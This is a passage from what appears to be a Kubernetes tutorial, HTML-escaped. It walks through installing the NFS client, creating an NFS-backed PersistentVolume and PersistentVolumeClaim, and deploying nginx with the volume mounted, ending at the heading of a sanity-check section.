&lt;p&gt;We must install the  &lt;code&gt;nfs-common&lt;/code&gt;  packages to access to the NFS share so let’s install it by running the following command on each node:&lt;/p&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;figcaption&gt;&lt;span&gt;Command Line Prompt&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;4n6nk8s@4n6nk8s-worker1:~$ sudo apt install nfs-common&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;This command mount the NFS Share on one node for testing and sanity check only&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;The mount command is not a mandatory step. We mount for testing purposes. you can skip to the next section&lt;/p&gt;
&lt;/blockquote&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;figcaption&gt;&lt;span&gt;Command Line Prompt&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;4n6nk8s@4n6nk8s-worker1:~$ sudo mount 4n6nk8s-nfs:/mnt/nfs-data  /mnt&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;Let’s Create a file for testing&lt;/p&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;figcaption&gt;&lt;span&gt;Command Line Prompt&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;4n6nk8s@4n6nk8s-worker1:~$ &lt;span class=&#34;built_in&#34;&gt;cd&lt;/span&gt; /mnt&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;4n6nk8s@4n6nk8s-worker1:/mnt $ &lt;span class=&#34;built_in&#34;&gt;touch&lt;/span&gt; file &lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;Check the  &lt;code&gt;/mnt/nfs-data&lt;/code&gt;  on the NFS server&lt;/p&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;figcaption&gt;&lt;span&gt;Command Line Prompt&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;3&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;4n6nk8s@4n6nk8s-nfs:~$ &lt;span class=&#34;built_in&#34;&gt;cd&lt;/span&gt; /mnt/nfs-data&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;4n6nk8s@4n6nk8s-nfs:/mnt/nfs-data$ &lt;span class=&#34;built_in&#34;&gt;ls&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;file &lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;h2 id=&#34;kubernetes-with-nfs-remote-storage-demo&#34;&gt;&lt;a class=&#34;markdownIt-Anchor&#34; href=&#34;#kubernetes-with-nfs-remote-storage-demo&#34;&gt;#&lt;/a&gt; Kubernetes with NFS remote Storage demo&lt;/h2&gt;
&lt;p&gt;After Setting up the NFS server and install the NFS client on the kubernetes nodes. Now it’s time to do some practice with  &lt;code&gt;Persistent Volume&lt;/code&gt;  and  &lt;code&gt;Persistent Volume Claim&lt;/code&gt;  with NFS storage.&lt;/p&gt;
&lt;h3 id=&#34;create-a-persistent-volume-with-nfs&#34;&gt;&lt;a class=&#34;markdownIt-Anchor&#34; href=&#34;#create-a-persistent-volume-with-nfs&#34;&gt;#&lt;/a&gt; Create a Persistent Volume with NFS&lt;/h3&gt;
&lt;p&gt;Example of Persistent Volume manifest using nfs:&lt;/p&gt;
&lt;figure class=&#34;highlight yaml&#34;&gt;&lt;figcaption&gt;&lt;span&gt;PersistentVolume&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;3&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;4&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;5&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;6&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;7&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;8&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;9&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;10&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;11&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;12&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;13&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;14&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;attr&#34;&gt;apiVersion:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;v1&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;attr&#34;&gt;kind:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;PersistentVolume&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;attr&#34;&gt;metadata:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;  &lt;span class=&#34;attr&#34;&gt;name:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;pv-nfs&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;attr&#34;&gt;spec:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;  &lt;span class=&#34;attr&#34;&gt;capacity:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    &lt;span class=&#34;attr&#34;&gt;storage:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;100Mi&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;  &lt;span class=&#34;attr&#34;&gt;accessModes:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    &lt;span class=&#34;bullet&#34;&gt;-&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;ReadWriteMany&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;  &lt;span class=&#34;attr&#34;&gt;storageClassName:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;nfs&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;  &lt;span class=&#34;attr&#34;&gt;nfs:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    &lt;span class=&#34;attr&#34;&gt;server:&lt;/span&gt; &lt;span class=&#34;number&#34;&gt;192.168&lt;/span&gt;&lt;span class=&#34;number&#34;&gt;.1&lt;/span&gt;&lt;span class=&#34;number&#34;&gt;.80&lt;/span&gt; &lt;span class=&#34;comment&#34;&gt;# the IP address of 4n6nk8s-nfs host&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    &lt;span class=&#34;attr&#34;&gt;path:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;&amp;quot;/mnt/nfs-data&amp;quot;&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;Make sure to put the correct IP address of the NFS server and the correct NFS Share point!&lt;br&gt;
Create the persistent volume using kubectl&lt;/p&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;figcaption&gt;&lt;span&gt;Command Line Prompt&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;4n6nk8s@4n6nk8s-master:~$ kubectl apply -f nfs-pv.yaml&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;persistentvolume/pv-nfs created&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;List the Persistent Volumes to make sure for the creation&lt;/p&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;figcaption&gt;&lt;span&gt;Command Line Prompt&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;3&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;4&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;4n6nk8s@4n6nk8s-master:~$ kubectl get pv&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;NAME     CAPACITY   ACCESS MODES   RECLAIM POLICY   STATUS      CLAIM   STORAGECLASS   REASON   AGE&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;pv-nfs   100Mi      RWX            Retain           Available           nfs                     4s&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;h3 id=&#34;create-a-persistent-volume-claim-with-nfs&#34;&gt;&lt;a class=&#34;markdownIt-Anchor&#34; href=&#34;#create-a-persistent-volume-claim-with-nfs&#34;&gt;#&lt;/a&gt; Create a Persistent Volume Claim with NFS&lt;/h3&gt;
&lt;p&gt;Example of Persistent Volume Claim manifest using nfs:&lt;/p&gt;
&lt;figure class=&#34;highlight yaml&#34;&gt;&lt;figcaption&gt;&lt;span&gt;PersistentVolumeClaim&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;3&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;4&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;5&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;6&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;7&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;8&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;9&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;10&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;11&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;12&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;attr&#34;&gt;apiVersion:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;v1&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;attr&#34;&gt;kind:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;PersistentVolumeClaim&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;attr&#34;&gt;metadata:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;  &lt;span class=&#34;attr&#34;&gt;name:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;pvc-nfs&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;attr&#34;&gt;spec:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;  &lt;span class=&#34;attr&#34;&gt;accessModes:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    &lt;span class=&#34;bullet&#34;&gt;-&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;ReadWriteMany&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;  &lt;span class=&#34;attr&#34;&gt;storageClassName:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;nfs&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;  &lt;span class=&#34;attr&#34;&gt;resources:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    &lt;span class=&#34;attr&#34;&gt;requests:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;        &lt;span class=&#34;attr&#34;&gt;storage:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;100Mi&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;Create the persistent volume using kubectl&lt;/p&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;figcaption&gt;&lt;span&gt;Command Line Prompt&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;4n6nk8s@4n6nk8s-master:~$ kubectl apply -f nfs-pvc.yaml&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;persistentvolumeclaim/pvc-nfs created&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;List the  &lt;code&gt;Persistent Volumes Claims&lt;/code&gt;  to make sure for the creation&lt;/p&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;figcaption&gt;&lt;span&gt;Command Line Prompt&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;3&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;4n6nk8s@4n6nk8s-master:~$ kubectl get pvc&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;NAME      STATUS   VOLUME   CAPACITY   ACCESS MODES   STORAGECLASS   AGE&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;pvc-nfs   Bound    pv-nfs   100Mi      RWX            nfs            3s&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;h3 id=&#34;create-nginx-deployment&#34;&gt;&lt;a class=&#34;markdownIt-Anchor&#34; href=&#34;#create-nginx-deployment&#34;&gt;#&lt;/a&gt; Create Nginx Deployment&lt;/h3&gt;
&lt;p&gt;We use the  &lt;code&gt;volumeMounts&lt;/code&gt;  and  &lt;code&gt;volumes &lt;/code&gt; attributes in this manifest to use the persistent volume we created:&lt;/p&gt;
&lt;figure class=&#34;highlight yaml&#34;&gt;&lt;figcaption&gt;&lt;span&gt;Deployment&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;3&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;4&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;5&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;6&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;7&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;8&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;9&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;10&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;11&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;12&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;13&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;14&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;15&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;16&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;17&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;18&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;19&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;20&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;21&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;22&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;23&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;24&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;25&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;26&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;27&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;28&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;29&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;attr&#34;&gt;apiVersion:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;apps/v1&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;attr&#34;&gt;kind:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;Deployment&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;attr&#34;&gt;metadata:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    &lt;span class=&#34;attr&#34;&gt;name:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;nginx-deployment&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    &lt;span class=&#34;attr&#34;&gt;labels:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;        &lt;span class=&#34;attr&#34;&gt;role:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;webserver&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;attr&#34;&gt;spec:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    &lt;span class=&#34;attr&#34;&gt;replicas:&lt;/span&gt; &lt;span class=&#34;number&#34;&gt;3&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    &lt;span class=&#34;attr&#34;&gt;selector:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;        &lt;span class=&#34;attr&#34;&gt;matchLabels:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;            &lt;span class=&#34;attr&#34;&gt;role:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;webserver&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    &lt;span class=&#34;attr&#34;&gt;template:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;        &lt;span class=&#34;attr&#34;&gt;metadata:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;            &lt;span class=&#34;attr&#34;&gt;labels:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;                &lt;span class=&#34;attr&#34;&gt;role:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;webserver&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;        &lt;span class=&#34;attr&#34;&gt;spec:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;            &lt;span class=&#34;attr&#34;&gt;containers:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;            &lt;span class=&#34;bullet&#34;&gt;-&lt;/span&gt; &lt;span class=&#34;attr&#34;&gt;name:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;frontend&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;              &lt;span class=&#34;attr&#34;&gt;image:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;nginx&lt;/span&gt;  &lt;span class=&#34;comment&#34;&gt;# we use wrong image for the demo !&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;              &lt;span class=&#34;attr&#34;&gt;ports:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;                &lt;span class=&#34;bullet&#34;&gt;-&lt;/span&gt; &lt;span class=&#34;attr&#34;&gt;name:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;nginx-port&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;                  &lt;span class=&#34;attr&#34;&gt;containerPort:&lt;/span&gt; &lt;span class=&#34;number&#34;&gt;80&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;              &lt;span class=&#34;attr&#34;&gt;volumeMounts:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;                &lt;span class=&#34;bullet&#34;&gt;-&lt;/span&gt; &lt;span class=&#34;attr&#34;&gt;name:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;nfs&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;                  &lt;span class=&#34;attr&#34;&gt;mountPath:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;/usr/share/nginx/html&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;            &lt;span class=&#34;attr&#34;&gt;volumes:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;            &lt;span class=&#34;bullet&#34;&gt;-&lt;/span&gt; &lt;span class=&#34;attr&#34;&gt;name:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;nfs&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;              &lt;span class=&#34;attr&#34;&gt;persistentVolumeClaim:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;                &lt;span class=&#34;attr&#34;&gt;claimName:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;pvc-nfs&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;Deploy the  &lt;code&gt;nginx-deployment.yaml&lt;/code&gt;  using the  &lt;code&gt;kubectl apply -f&lt;/code&gt; .&lt;/p&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;figcaption&gt;&lt;span&gt;Command Line Prompt&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;4n6nk8s@4n6nk8s-master:~$ kubectl apply -f nginx-deployment.yaml&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;deployment.apps/nginx-deployment created&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;Make sure that the deployment was created without any problems!&lt;/p&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;figcaption&gt;&lt;span&gt;Command Line Prompt&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;3&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;4&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;5&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;4n6nk8s@4n6nk8s-master:~$ kubectl get pods&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;NAME                                READY   STATUS    RESTARTS   AGE&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;nginx-deployment-7976956b49-fgbb4   1/1     Running   0          16s&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;nginx-deployment-7976956b49-hzrmm   1/1     Running   0          16s&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;nginx-deployment-7976956b49-kg5tx   1/1     Running   0          16s&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;h3 id=&#34;sanity-check-testing-the-nfs-volumes&#34;&gt;&lt;a class=&#34;markdownIt-Anchor&#34; href=&#34;#sanity-check-testing-the-nfs-volumes&#34;&gt;#&lt;/a&gt; Sanity Check (Testing the NFS volumes):&lt;/h3&gt;
